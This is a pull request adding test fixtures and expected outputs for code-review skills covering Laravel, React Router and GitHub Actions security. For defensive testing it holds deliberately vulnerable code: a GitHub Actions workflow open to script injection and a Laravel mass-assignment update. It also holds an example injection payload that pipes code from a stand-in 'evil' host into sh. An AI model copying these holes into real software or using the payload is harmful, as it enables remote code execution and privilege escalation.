### PR TITLE
feat(skills): add S1 fixtures and promote stack packs to community

### DIFF
--- a/docs/data/skill-manifest.json
+++ b/docs/data/skill-manifest.json
@@ -90,8 +90,8 @@
     {
       "id": "rr-downstream-gha-workflow-security-001",
       "path": "skills/downstream/rr-downstream-gha-workflow-security-001",
-      "checksum": "sha256:d40f8c47a4aecf19f77f1fac5fbaecb5b706db9365d7553df63a74ea9fb6c5d3",
-      "files": 1
+      "checksum": "sha256:83d8f97dc7541315596e1073019a10b5d0982e74ae4e44238cecab139ca463c5",
+      "files": 4
     },
     {
       "id": "rr-downstream-review-policy-standard-001",
@@ -192,14 +192,14 @@
     {
       "id": "rr-midstream-laravel-eloquent-nplus1-001",
       "path": "skills/midstream/rr-midstream-laravel-eloquent-nplus1-001",
-      "checksum": "sha256:bf31e12a6819364679b76e47b46f602b3ce99532d14ea4d8242e25a3d50a080e",
-      "files": 1
+      "checksum": "sha256:31595f3143ecb4ba9eeff8d6d5430852fe07d402faa6c0cd2c04e732b86d7eb2",
+      "files": 4
     },
     {
       "id": "rr-midstream-laravel-mass-assignment-001",
       "path": "skills/midstream/rr-midstream-laravel-mass-assignment-001",
-      "checksum": "sha256:1d019045e8caabc2b4ec045cf765170ce0e1bc64bd840e3f9adad47a411a18bd",
-      "files": 1
+      "checksum": "sha256:a0e09407ebfaa0835137d84859ae72f588a279b13f3e97826b75cfaf71ffcd57",
+      "files": 4
     },
     {
       "id": "rr-midstream-loading-state-001",
@@ -270,14 +270,14 @@
     {
       "id": "rr-midstream-react-router-action-contract-001",
       "path": "skills/midstream/rr-midstream-react-router-action-contract-001",
-      "checksum": "sha256:0da5c7037b2655bd1d609e6a82185664f6fcb32915bff0562c84d026d08bf740",
-      "files": 1
+      "checksum": "sha256:ed17070ccb02c0183d459480ba814a8f886fa445c2296ffd8fe5cbff5a01afe3",
+      "files": 4
     },
     {
       "id": "rr-midstream-react-router-loader-boundary-001",
       "path": "skills/midstream/rr-midstream-react-router-loader-boundary-001",
-      "checksum": "sha256:c8f7b3e8417465de4fc317df0d99dab358c73208bc0604e1a78804f85feda9b1",
-      "files": 1
+      "checksum": "sha256:b24a2f9df6aeab9f568b7d67b6b3b568cba629e5c1f251f6f4c17b85f2af45f8",
+      "files": 4
     },
     {
       "id": "rr-midstream-review-automation-boundary-001",
@@ -480,8 +480,8 @@
     {
       "id": "rr-upstream-laravel-migration-safety-001",
       "path": "skills/upstream/rr-upstream-laravel-migration-safety-001",
-      "checksum": "sha256:fbb82f5c3e1f9bc24656ab55a638baede6207dc6c64be24aaa1d1a9fea0da7b8",
-      "files": 1
+      "checksum": "sha256:05fec8c75d8a4f40356ed7a66e071b9b8da1c09d41f0a5acb1eda149db191be2",
+      "files": 4
     },
     {
       "id": "rr-upstream-migration-rollout-rollback-001",

--- a/pages/reference/skills-catalog.md
+++ b/pages/reference/skills-catalog.md
@@ -6,13 +6,13 @@ River Review に同梱されているスキル一覧です。フェーズ別に�
 
 梱包済みレビューナレッジの配布単位です。`--skill-set <id>` で導入できます（詳細は [Skill Pack を使う](../guides/use-skill-packs.md) を参照）。
 
-| id             | name                             | axis        | tier         | skills                                                                                                                               |
-| -------------- | -------------------------------- | ----------- | ------------ | ------------------------------------------------------------------------------------------------------------------------------------ |
-| `typescript`   | TypeScript Review Pack           | technology  | official     | `rr-midstream-typescript-strict-001` / `rr-midstream-typescript-nullcheck-001` / `rr-midstream-type-driven-design-001`               |
-| `ddd`          | Domain-Driven Design Review Pack | methodology | community    | `rr-upstream-bounded-context-language-001` / `rr-midstream-type-driven-design-001` / `rr-midstream-ubiquitous-language-naming-001`   |
-| `react-router` | React Router Review Pack         | technology  | experimental | `rr-midstream-react-router-loader-boundary-001` / `rr-midstream-react-router-action-contract-001`                                    |
-| `laravel`      | Laravel Review Pack              | technology  | experimental | `rr-midstream-laravel-eloquent-nplus1-001` / `rr-upstream-laravel-migration-safety-001` / `rr-midstream-laravel-mass-assignment-001` |
-| `gha-security` | GitHub Actions Security Pack     | concern     | experimental | `rr-downstream-gha-workflow-security-001`                                                                                            |
+| id             | name                             | axis        | tier      | skills                                                                                                                               |
+| -------------- | -------------------------------- | ----------- | --------- | ------------------------------------------------------------------------------------------------------------------------------------ |
+| `typescript`   | TypeScript Review Pack           | technology  | official  | `rr-midstream-typescript-strict-001` / `rr-midstream-typescript-nullcheck-001` / `rr-midstream-type-driven-design-001`               |
+| `ddd`          | Domain-Driven Design Review Pack | methodology | community | `rr-upstream-bounded-context-language-001` / `rr-midstream-type-driven-design-001` / `rr-midstream-ubiquitous-language-naming-001`   |
+| `react-router` | React Router Review Pack         | technology  | community | `rr-midstream-react-router-loader-boundary-001` / `rr-midstream-react-router-action-contract-001`                                    |
+| `laravel`      | Laravel Review Pack              | technology  | community | `rr-midstream-laravel-eloquent-nplus1-001` / `rr-upstream-laravel-migration-safety-001` / `rr-midstream-laravel-mass-assignment-001` |
+| `gha-security` | GitHub Actions Security Pack     | concern     | community | `rr-downstream-gha-workflow-security-001`                                                                                            |
 
 ## upstream
 

--- a/skills/downstream/rr-downstream-gha-workflow-security-001/fixtures/01-script-injection-happy.md
+++ b/skills/downstream/rr-downstream-gha-workflow-security-001/fixtures/01-script-injection-happy.md
@@ -1,0 +1,30 @@
+# Test Case: Script Injection via Untrusted Input (Happy Path)
+
+## Description
+
+Verifies the skill flags untrusted `github.event.*` fields expanded directly into a `run:` step, which allows shell command injection.
+
+## Input Diff
+
+```diff
+diff --git a/.github/workflows/pr-comment.yml b/.github/workflows/pr-comment.yml
+index 1234567..89abcde 100644
+--- a/.github/workflows/pr-comment.yml
++++ b/.github/workflows/pr-comment.yml
+@@ -1,5 +1,12 @@
++on: issue_comment
++jobs:
++  greet:
++    runs-on: ubuntu-latest
++    steps:
++      - run: echo "Title is ${{ github.event.issue.title }}"
++      - run: ./build.sh "${{ github.head_ref }}"
+```
+
+## Expected Behavior
+
+The skill should:
+
+1. Flag `${{ github.event.issue.title }}` and `${{ github.head_ref }}` expanded into `run:` as script injection (attacker-controlled fields)
+2. Recommend passing the values through `env:` instead of inlining into the shell
+3. Treat this as critical severity (RCE in a token-bearing context)

--- a/skills/downstream/rr-downstream-gha-workflow-security-001/fixtures/02-safe-fields-guard.md
+++ b/skills/downstream/rr-downstream-gha-workflow-security-001/fixtures/02-safe-fields-guard.md
@@ -1,0 +1,34 @@
+# Test Case: Safe Fields and env-Passing (False Positive Guard)
+
+## Description
+
+Verifies the skill does NOT flag constrained/safe fields and the correct `env:`-passing pattern.
+
+## Input Diff
+
+```diff
+diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
+index 1234567..89abcde 100644
+--- a/.github/workflows/ci.yml
++++ b/.github/workflows/ci.yml
+@@ -1,6 +1,14 @@
++on: pull_request
++permissions:
++  contents: read
++jobs:
++  build:
++    runs-on: ubuntu-latest
++    steps:
++      - run: echo "PR number ${{ github.event.pull_request.number }} by ${{ github.actor }}"
++      - env:
++          TITLE: ${{ github.event.pull_request.title }}
++        run: echo "$TITLE"
+```
+
+## Expected Behavior
+
+The skill should:
+
+1. NOT flag `github.event.pull_request.number` / `github.actor` (constrained, non-injectable fields)
+2. NOT flag the `env:`-passed `TITLE` usage (the correct mitigation)
+3. Produce no findings

--- a/skills/downstream/rr-downstream-gha-workflow-security-001/golden/01-script-injection-happy.md
+++ b/skills/downstream/rr-downstream-gha-workflow-security-001/golden/01-script-injection-happy.md
@@ -1,0 +1,18 @@
+# Expected Output: Script Injection via Untrusted Input
+
+**Finding:** Attacker-controlled `github.event.issue.title` is expanded directly into a `run:` shell step
+
+**Evidence:** `.github/workflows/pr-comment.yml` — `run: echo "Title is ${{ github.event.issue.title }}"` and `run: ./build.sh "${{ github.head_ref }}"`
+
+**Impact:** An issue title / branch name like `"; curl evil | sh; #` executes arbitrary commands in a context that holds `GITHUB_TOKEN` and secrets (RCE). Quoting does not help because the expression is substituted before the shell parses it.
+
+**Fix:** Pass the values through `env:` so they become shell variables instead of inlined script:
+
+```yaml
+- env:
+    TITLE: ${{ github.event.issue.title }}
+  run: echo "Title is $TITLE"
+```
+
+**Severity:** critical
+**Confidence:** high

--- a/skills/midstream/rr-midstream-laravel-eloquent-nplus1-001/fixtures/01-nplus1-loop-happy.md
+++ b/skills/midstream/rr-midstream-laravel-eloquent-nplus1-001/fixtures/01-nplus1-loop-happy.md
@@ -1,0 +1,31 @@
+# Test Case: N+1 Query in a Loop (Happy Path)
+
+## Description
+
+Verifies the skill flags a relation accessed inside a loop without eager loading.
+
+## Input Diff
+
+```diff
+diff --git a/app/Http/Controllers/BookController.php b/app/Http/Controllers/BookController.php
+index 1234567..89abcde 100644
+--- a/app/Http/Controllers/BookController.php
++++ b/app/Http/Controllers/BookController.php
+@@ -1,4 +1,12 @@
++    public function index()
++    {
++        $books = Book::all();
++        foreach ($books as $book) {
++            echo $book->author->name; // separate query per book
++        }
++        return view('books.index', compact('books'));
++    }
+```
+
+## Expected Behavior
+
+The skill should:
+
+1. Flag `$book->author->name` inside the loop as N+1 (one query per book)
+2. Recommend `Book::with('author')->get()` (eager loading)
+3. Reference the eager-loading convention

--- a/skills/midstream/rr-midstream-laravel-eloquent-nplus1-001/fixtures/02-eager-loaded-guard.md
+++ b/skills/midstream/rr-midstream-laravel-eloquent-nplus1-001/fixtures/02-eager-loaded-guard.md
@@ -1,0 +1,30 @@
+# Test Case: Already Eager-Loaded Relation (False Positive Guard)
+
+## Description
+
+Verifies the skill does NOT flag a relation accessed in a loop when it was eager-loaded in the same change.
+
+## Input Diff
+
+```diff
+diff --git a/app/Http/Controllers/BookController.php b/app/Http/Controllers/BookController.php
+index 1234567..89abcde 100644
+--- a/app/Http/Controllers/BookController.php
++++ b/app/Http/Controllers/BookController.php
+@@ -1,4 +1,12 @@
++    public function index()
++    {
++        $books = Book::with('author')->get();
++        foreach ($books as $book) {
++            echo $book->author->name; // already eager-loaded
++        }
++        return view('books.index', compact('books'));
++    }
+```
+
+## Expected Behavior
+
+The skill should:
+
+1. NOT flag `$book->author->name` — `with('author')` eager-loads the relation, so there is no N+1
+2. Produce no findings

--- a/skills/midstream/rr-midstream-laravel-eloquent-nplus1-001/golden/01-nplus1-loop-happy.md
+++ b/skills/midstream/rr-midstream-laravel-eloquent-nplus1-001/golden/01-nplus1-loop-happy.md
@@ -1,0 +1,16 @@
+# Expected Output: N+1 Query in a Loop
+
+**Finding:** `author` relation accessed inside a `foreach` without eager loading (N+1)
+
+**Evidence:** `app/Http/Controllers/BookController.php` — `Book::all()` then `$book->author->name` in the loop
+
+**Impact:** One extra query per book (25 books → 26 queries). Scales linearly with row count and degrades the endpoint under load.
+
+**Fix:** Eager-load the relation:
+
+```php
+$books = Book::with('author')->get();
+```
+
+**Severity:** major
+**Confidence:** high

--- a/skills/midstream/rr-midstream-laravel-mass-assignment-001/fixtures/01-request-all-happy.md
+++ b/skills/midstream/rr-midstream-laravel-mass-assignment-001/fixtures/01-request-all-happy.md
@@ -1,0 +1,28 @@
+# Test Case: Mass Assignment via request->all() (Happy Path)
+
+## Description
+
+Verifies the skill flags `update($request->all())` on a mutating action with no field allow-listing and no authorization.
+
+## Input Diff
+
+```diff
+diff --git a/app/Http/Controllers/UserController.php b/app/Http/Controllers/UserController.php
+index 1234567..89abcde 100644
+--- a/app/Http/Controllers/UserController.php
++++ b/app/Http/Controllers/UserController.php
+@@ -1,4 +1,10 @@
++    public function update(Request $request, User $user)
++    {
++        $user->update($request->all());
++        return redirect()->route('users.show', $user);
++    }
+```
+
+## Expected Behavior
+
+The skill should:
+
+1. Flag `$user->update($request->all())` as mass assignment (an `is_admin` field in the request could escalate privileges)
+2. Flag the missing authorization on this update action
+3. Recommend `$request->validated()` / `safe()->only([...])` and a Policy / Gate check

--- a/skills/midstream/rr-midstream-laravel-mass-assignment-001/fixtures/02-validated-authorized-guard.md
+++ b/skills/midstream/rr-midstream-laravel-mass-assignment-001/fixtures/02-validated-authorized-guard.md
@@ -1,0 +1,28 @@
+# Test Case: Validated Input with Authorization (False Positive Guard)
+
+## Description
+
+Verifies the skill does NOT flag an update that uses a FormRequest (validated input + `authorize()`).
+
+## Input Diff
+
+```diff
+diff --git a/app/Http/Controllers/UserController.php b/app/Http/Controllers/UserController.php
+index 1234567..89abcde 100644
+--- a/app/Http/Controllers/UserController.php
++++ b/app/Http/Controllers/UserController.php
+@@ -1,4 +1,10 @@
++    // UpdateUserRequest::authorize() returns $this->user()->can('update', $this->route('user'))
++    public function update(UpdateUserRequest $request, User $user)
++    {
++        $user->update($request->validated());
++        return redirect()->route('users.show', $user);
++    }
+```
+
+## Expected Behavior
+
+The skill should:
+
+1. NOT flag the update — `$request->validated()` allow-lists fields and the FormRequest's `authorize()` handles authorization
+2. Produce no findings

--- a/skills/midstream/rr-midstream-laravel-mass-assignment-001/golden/01-request-all-happy.md
+++ b/skills/midstream/rr-midstream-laravel-mass-assignment-001/golden/01-request-all-happy.md
@@ -1,0 +1,21 @@
+# Expected Output: Mass Assignment via request->all()
+
+**Finding:** `$user->update($request->all())` mass-assigns unfiltered input, and the action has no authorization check
+
+**Evidence:** `app/Http/Controllers/UserController.php` — `update(Request $request, User $user)` calling `$user->update($request->all())`
+
+**Impact:** A crafted request containing `is_admin=1` (or any non-fillable-but-fillable field) can escalate privileges or tamper with data; without an authorization check any authenticated user can update any user.
+
+**Fix:** Allow-list fields and authorize the action:
+
+```php
+public function update(UpdateUserRequest $request, User $user)
+{
+    // UpdateUserRequest::authorize() -> $this->user()->can('update', $user)
+    $user->update($request->validated());
+    return redirect()->route('users.show', $user);
+}
+```
+
+**Severity:** major
+**Confidence:** high

--- a/skills/midstream/rr-midstream-react-router-action-contract-001/fixtures/01-thrown-validation-happy.md
+++ b/skills/midstream/rr-midstream-react-router-action-contract-001/fixtures/01-thrown-validation-happy.md
@@ -1,0 +1,32 @@
+# Test Case: Validation Error Thrown to ErrorBoundary (Happy Path)
+
+## Description
+
+Verifies the skill flags expected validation failures that are `throw`n (reaching the ErrorBoundary) instead of returned as data with a 4xx status.
+
+## Input Diff
+
+```diff
+diff --git a/app/routes/signup.tsx b/app/routes/signup.tsx
+index 1234567..89abcde 100644
+--- a/app/routes/signup.tsx
++++ b/app/routes/signup.tsx
+@@ -1,4 +1,12 @@
++export async function action({ request }: Route.ActionArgs) {
++  const form = await request.formData();
++  const email = String(form.get('email'));
++  if (!email.includes('@')) {
++    throw new Response('Invalid email', { status: 400 });
++  }
++  await createUser(email);
++  return { ok: true };
++}
+```
+
+## Expected Behavior
+
+The skill should:
+
+1. Flag the thrown validation error (should be returned as `data({ errors }, { status: 400 })` for inline display)
+2. Flag the missing `redirect()` on success (returns `{ ok: true }` instead)
+3. Reference the form-validation convention

--- a/skills/midstream/rr-midstream-react-router-action-contract-001/fixtures/02-intentional-404-guard.md
+++ b/skills/midstream/rr-midstream-react-router-action-contract-001/fixtures/02-intentional-404-guard.md
@@ -1,0 +1,31 @@
+# Test Case: Intentional 404 Throw (False Positive Guard)
+
+## Description
+
+Verifies the skill does NOT flag the deliberate `throw data(..., { status: 404 })` for a missing resource — an officially sanctioned pattern distinct from validation errors.
+
+## Input Diff
+
+```diff
+diff --git a/app/routes/post.tsx b/app/routes/post.tsx
+index 1234567..89abcde 100644
+--- a/app/routes/post.tsx
++++ b/app/routes/post.tsx
+@@ -1,4 +1,11 @@
++import { data, redirect } from 'react-router';
++
++export async function action({ params }: Route.ActionArgs) {
++  const post = await getPost(params.id);
++  if (!post) throw data('Not Found', { status: 404 });
++  await deletePost(post.id);
++  return redirect('/posts');
++}
+```
+
+## Expected Behavior
+
+The skill should:
+
+1. NOT flag `throw data('Not Found', { status: 404 })` — intentional resource-absence throw, not a validation error
+2. Recognize the success path correctly uses `redirect()`
+3. Produce no findings

--- a/skills/midstream/rr-midstream-react-router-action-contract-001/golden/01-thrown-validation-happy.md
+++ b/skills/midstream/rr-midstream-react-router-action-contract-001/golden/01-thrown-validation-happy.md
@@ -1,0 +1,20 @@
+# Expected Output: Validation Error Thrown to ErrorBoundary
+
+**Finding:** Expected validation failure is `throw`n (hits the ErrorBoundary) instead of returned as data with a 4xx status; success path does not `redirect()`
+
+**Evidence:** `app/routes/signup.tsx` — `throw new Response('Invalid email', { status: 400 })` and `return { ok: true }`
+
+**Impact:** Throwing breaks inline form-error display and the automatic revalidation control; returning `{ ok: true }` without a redirect leaves a resubmission hazard.
+
+**Fix:** Return validation errors as data and redirect on success:
+
+```tsx
+if (!email.includes('@')) {
+  return data({ errors: { email: 'Invalid email' } }, { status: 400 });
+}
+await createUser(email);
+return redirect('/welcome');
+```
+
+**Severity:** major
+**Confidence:** high

--- a/skills/midstream/rr-midstream-react-router-loader-boundary-001/fixtures/01-useeffect-fetch-happy.md
+++ b/skills/midstream/rr-midstream-react-router-loader-boundary-001/fixtures/01-useeffect-fetch-happy.md
@@ -1,0 +1,35 @@
+# Test Case: Route Data Fetched in useEffect (Happy Path)
+
+## Description
+
+Verifies the skill flags route-tied initial data fetched in `useEffect` instead of a `loader`.
+
+## Input Diff
+
+```diff
+diff --git a/app/routes/dashboard.tsx b/app/routes/dashboard.tsx
+index 1234567..89abcde 100644
+--- a/app/routes/dashboard.tsx
++++ b/app/routes/dashboard.tsx
+@@ -1,4 +1,15 @@
++import { useEffect, useState } from 'react';
++
++export default function Dashboard() {
++  const [stats, setStats] = useState(null);
++  useEffect(() => {
++    fetch('/api/stats')
++      .then((r) => r.json())
++      .then(setStats);
++  }, []);
++  if (!stats) return <Spinner />;
++  return <StatsView stats={stats} />;
++}
+```
+
+## Expected Behavior
+
+The skill should:
+
+1. Flag the `useEffect` + `fetch` of route-tied initial data
+2. Recommend moving it to a `loader` (SSR, no double-fetch / hydration mismatch)
+3. Tie the finding to the file/line with the data-loading convention reference

--- a/skills/midstream/rr-midstream-react-router-loader-boundary-001/fixtures/02-polling-guard.md
+++ b/skills/midstream/rr-midstream-react-router-loader-boundary-001/fixtures/02-polling-guard.md
@@ -1,0 +1,35 @@
+# Test Case: Non-navigation Polling (False Positive Guard)
+
+## Description
+
+Verifies the skill does NOT flag `useEffect` used for real-time polling that is not tied to route navigation.
+
+## Input Diff
+
+```diff
+diff --git a/app/routes/live.tsx b/app/routes/live.tsx
+index 1234567..89abcde 100644
+--- a/app/routes/live.tsx
++++ b/app/routes/live.tsx
+@@ -1,4 +1,14 @@
++import { useEffect } from 'react';
++import type { Route } from './+types/live';
++
++export async function loader() { return { initial: await getMetrics() }; }
++
++export default function Live({ loaderData }: Route.ComponentProps) {
++  useEffect(() => {
++    const id = setInterval(() => refetchMetrics(), 5000); // live polling
++    return () => clearInterval(id);
++  }, []);
++  return <Metrics data={loaderData.initial} />;
++}
+```
+
+## Expected Behavior
+
+The skill should:
+
+1. NOT flag the `useEffect` polling — it is real-time refresh, not navigation-tied initial data
+2. Recognize the initial data is already loaded via `loader`
+3. Produce no findings

--- a/skills/midstream/rr-midstream-react-router-loader-boundary-001/golden/01-useeffect-fetch-happy.md
+++ b/skills/midstream/rr-midstream-react-router-loader-boundary-001/golden/01-useeffect-fetch-happy.md
@@ -1,0 +1,21 @@
+# Expected Output: Route Data Fetched in useEffect
+
+**Finding:** Route-tied initial data is fetched in `useEffect` instead of a `loader`
+
+**Evidence:** `app/routes/dashboard.tsx` — `useEffect(() => { fetch('/api/stats')... }, [])`
+
+**Impact:** Client-only fetch on mount causes a loading flash (no SSR), risks double-fetch / race conditions, and a hydration mismatch. The data is determined by the route, so it belongs in a loader.
+
+**Fix:** Move it to a `loader`:
+
+```tsx
+export async function loader() {
+  return { stats: await getStats() };
+}
+export default function Dashboard({ loaderData }: Route.ComponentProps) {
+  return <StatsView stats={loaderData.stats} />;
+}
+```
+
+**Severity:** major
+**Confidence:** high

--- a/skills/registry.yaml
+++ b/skills/registry.yaml
@@ -956,11 +956,11 @@ packs:
       - rr-midstream-ubiquitous-language-naming-001
 
   - id: react-router
-    version: '0.1.0'
+    version: '0.2.0'
     name: 'React Router Review Pack'
     description: 'React Router v7 (framework mode) の data loading / action 契約 / ErrorBoundary のレビュー基準'
     axis: technology
-    tier: experimental
+    tier: community
     sources:
       - name: 'React Router Docs (framework mode)'
         version: 'v7'
@@ -971,11 +971,11 @@ packs:
       - rr-midstream-react-router-action-contract-001
 
   - id: laravel
-    version: '0.1.0'
+    version: '0.2.0'
     name: 'Laravel Review Pack'
     description: 'Laravel 12 の Eloquent クエリ効率 / migration 安全性 / mass assignment・認可のレビュー基準'
     axis: technology
-    tier: experimental
+    tier: community
     sources:
       - name: 'Laravel Documentation'
         version: '12.x'
@@ -987,11 +987,11 @@ packs:
       - rr-midstream-laravel-mass-assignment-001
 
   - id: gha-security
-    version: '0.1.0'
+    version: '0.2.0'
     name: 'GitHub Actions Security Pack'
     description: 'GitHub Actions workflow のスクリプトインジェクション / pwn request / 権限・ピン留めのセキュリティレビュー基準'
     axis: concern
-    tier: experimental
+    tier: community
     sources:
       - name: 'GitHub — Secure use of GitHub Actions'
         version: '2026-06'

--- a/skills/upstream/rr-upstream-laravel-migration-safety-001/fixtures/01-change-drops-modifiers-happy.md
+++ b/skills/upstream/rr-upstream-laravel-migration-safety-001/fixtures/01-change-drops-modifiers-happy.md
@@ -1,0 +1,30 @@
+# Test Case: change() Dropping Modifiers (Happy Path)
+
+## Description
+
+Verifies the skill flags a `change()` that omits modifiers present on the original column, which silently drops them.
+
+## Input Diff
+
+```diff
+diff --git a/database/migrations/2026_06_11_000000_alter_votes.php b/database/migrations/2026_06_11_000000_alter_votes.php
+index 1234567..89abcde 100644
+--- a/database/migrations/2026_06_11_000000_alter_votes.php
++++ b/database/migrations/2026_06_11_000000_alter_votes.php
+@@ -1,4 +1,12 @@
++    public function up(): void
++    {
++        Schema::table('posts', function (Blueprint $table) {
++            // original: $table->integer('votes')->unsigned()->default(1)->comment('vote count');
++            $table->integer('votes')->change();
++        });
++    }
+```
+
+## Expected Behavior
+
+The skill should:
+
+1. Flag that `->change()` re-declares only the base type, silently dropping `unsigned`, `default(1)`, and `comment`
+2. Recommend re-listing all modifiers to keep
+3. Reference the modifying-columns convention

--- a/skills/upstream/rr-upstream-laravel-migration-safety-001/fixtures/02-create-table-index-guard.md
+++ b/skills/upstream/rr-upstream-laravel-migration-safety-001/fixtures/02-create-table-index-guard.md
@@ -1,0 +1,32 @@
+# Test Case: Index on a New Table (False Positive Guard)
+
+## Description
+
+Verifies the skill does NOT flag an index added inside `Schema::create` — a new table has no rows to lock.
+
+## Input Diff
+
+```diff
+diff --git a/database/migrations/2026_06_11_000001_create_tags.php b/database/migrations/2026_06_11_000001_create_tags.php
+index 1234567..89abcde 100644
+--- a/database/migrations/2026_06_11_000001_create_tags.php
++++ b/database/migrations/2026_06_11_000001_create_tags.php
+@@ -1,4 +1,13 @@
++    public function up(): void
++    {
++        Schema::create('tags', function (Blueprint $table) {
++            $table->id();
++            $table->string('slug');
++            $table->index('slug');
++        });
++    }
++    public function down(): void { Schema::dropIfExists('tags'); }
+```
+
+## Expected Behavior
+
+The skill should:
+
+1. NOT flag `$table->index('slug')` — it is inside `Schema::create`, so there is no locking concern (no existing rows)
+2. Recognize `down()` correctly reverses `up()`
+3. Produce no findings

--- a/skills/upstream/rr-upstream-laravel-migration-safety-001/golden/01-change-drops-modifiers-happy.md
+++ b/skills/upstream/rr-upstream-laravel-migration-safety-001/golden/01-change-drops-modifiers-happy.md
@@ -1,0 +1,16 @@
+# Expected Output: change() Dropping Modifiers
+
+**Finding:** `->change()` re-declares only the base type and silently drops the column's existing modifiers
+
+**Evidence:** `database/migrations/2026_06_11_000000_alter_votes.php` — `$table->integer('votes')->change()` where the original had `unsigned()->default(1)->comment(...)`
+
+**Impact:** Laravel requires every modifier to be re-listed on `change()`; the omitted `unsigned`, `default(1)`, and `comment` are dropped, altering column semantics and potentially failing inserts that relied on the default.
+
+**Fix:** Re-list all modifiers to keep:
+
+```php
+$table->integer('votes')->unsigned()->default(1)->comment('vote count')->change();
+```
+
+**Severity:** major
+**Confidence:** high


### PR DESCRIPTION
## 概要

#1126 で追加した 3 pack（react-router / laravel / gha-security）の全 6 skill に S1 fixture を整備し、experimental → **community** へ昇格します（typescript pack #1120 と同じ品質ストーリーの継続）。

## 変更内容

各 skill に以下を追加（計 18 ファイル）:
- happy-path fixture（検出すべき diff）
- false-positive guard fixture（黙るべき diff = canary）
- golden output（期待される finding）

**fixture はリサーチで判明した FP ガードを具体化**:
- React Router: ナビゲーション非紐づきの polling / 意図的な 404 throw を黙る
- Laravel: eager-load 済み relation / 新規テーブルの index を黙る
- GHA: 制約付きフィールド（number / actor）/ env 経由渡しを黙る

## tier 判断

- 3 pack を **community**（0.2.0）に設定。 は機械的に official 可能（fixtures 存在）と表示するが、**promptfoo eval 未整備のため community に留める**（typescript pack が official に到達したのは per-skill の promptfoo eval まで揃えたため）。over-declaration ではないので validate はパス
- official 昇格は promptfoo eval 整備 + maintainer review が次段階

## 検証

- `npm test` **1273/1273 pass** / `skills:validate` green / `skills:manifest` 102 skills / `format:check` green
- `packs:tier`: 全 5 pack が宣言 ≤ 機械評価（エラーなし）

🤖 Generated with [Claude Code](https://claude.com/claude-code)